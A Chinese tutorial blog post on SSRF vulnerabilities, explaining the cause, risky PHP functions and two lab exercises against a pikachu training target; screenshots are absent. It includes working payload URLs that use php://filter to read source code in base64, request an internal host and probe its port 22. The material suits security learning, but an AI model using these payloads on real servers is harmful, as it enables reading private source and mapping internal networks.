【网络安全】SSRF漏洞网站首页 技术交流

【网络安全】SSRF漏洞

边缘拼命划水的小陈 2023-06-07 12:00:02

简介【网络安全】SSRF漏洞

ssfr

ssrf产生的原因

SSRF(Server-Side Request Forgery:服务器端请求伪造)
由于服务器提供了从其他服务器获取应用数据的功能，但是又没有对目标地址做严格的过滤和限制，导致攻击者可以传入任意的地址来让后端服务对其发起请求，并返回对该目标地址请求的数据

原理展示

翻译软件会使用自己的服务器访问目标服务器
在这里插入图片描述

使用不当可能出现ssrf漏洞函数

file_get_contents()
fsockopen()
curl_exec()

漏洞检测(靶场一)

代码

在这里插入图片描述

curl是什么

在这里插入图片描述

检测服务器是否可以从其他服务器获取数据

在这里插入图片描述

使用file协议获取远端服务器的内容

远端服务器创建文本文件
在这里插入图片描述

利用dict协议探测端口

在这里插入图片描述

漏洞检测（靶场二）

代码

在这里插入图片描述

file_get_contents()

在这里插入图片描述

利用file协议读取服务器文件和敏感文件

在这里插入图片描述

利用http协议读取服务器文件

在这里插入图片描述

读取源码

http://192.168.0.106/06/vul/ssrf/ssrf_fgc.php?file=php://filter/read=convert.base64-encode/resource=ssrf.php

在这里插入图片描述

内网其他主机页面请求

http://localhost/pikachu-master/vul/ssrf/ssrf_fgc.php?file=http://192.168.10.100/index.html

内网其他主机端口探测

http://localhost/pikachu-master/vul/ssrf/ssrf_fgc.php?file=http://192.168.10.100:22

风语者！平时喜欢研究各种技术，目前在从事后端开发工作，热爱生活、热爱工作。

上一篇
元宇宙的应用领域

下一篇
Linux磁盘分区扩容

站长推荐

U8W/U8W-Mini使用与常见问题解决
U8W/U8W-Mini使用与常见问题解决
stm32使用HAL库配置串口中断收发数据（保姆级教程）
stm32使用HAL库配置串口中断收发数据（保姆级教程）
SpringSecurity实现前后端分离认证授权
SpringSecurity实现前后端分离认证授权
【社区图书馆】伴我前行的一本书《The C Programming Language》
【社区图书馆】伴我前行的一本书《The C Programming Language》
分享几个国内免费的ChatGPT镜像网址(亲测有效)
分享几个国内免费的ChatGPT镜像网址(亲测有效)

您现在的位置是：首页 >技术交流 >【网络安全】SSRF漏洞网站首页技术交流

【网络安全】SSRF漏洞

ssfr

ssrf产生的原因

原理展示

使用不当可能出现ssrf漏洞函数

漏洞检测(靶场一)

代码

curl是什么

检测服务器是否可以从其他服务器获取数据

使用file协议获取远端服务器的内容

利用dict协议探测端口

漏洞检测（靶场二）

代码

file_get_contents()

利用file协议读取服务器文件和敏感文件

利用http协议读取服务器文件

读取源码

内网其他主机页面请求

内网其他主机端口探测

上一篇 元宇宙的应用领域

下一篇 Linux磁盘分区扩容

站长推荐

上一篇
元宇宙的应用领域

下一篇
Linux磁盘分区扩容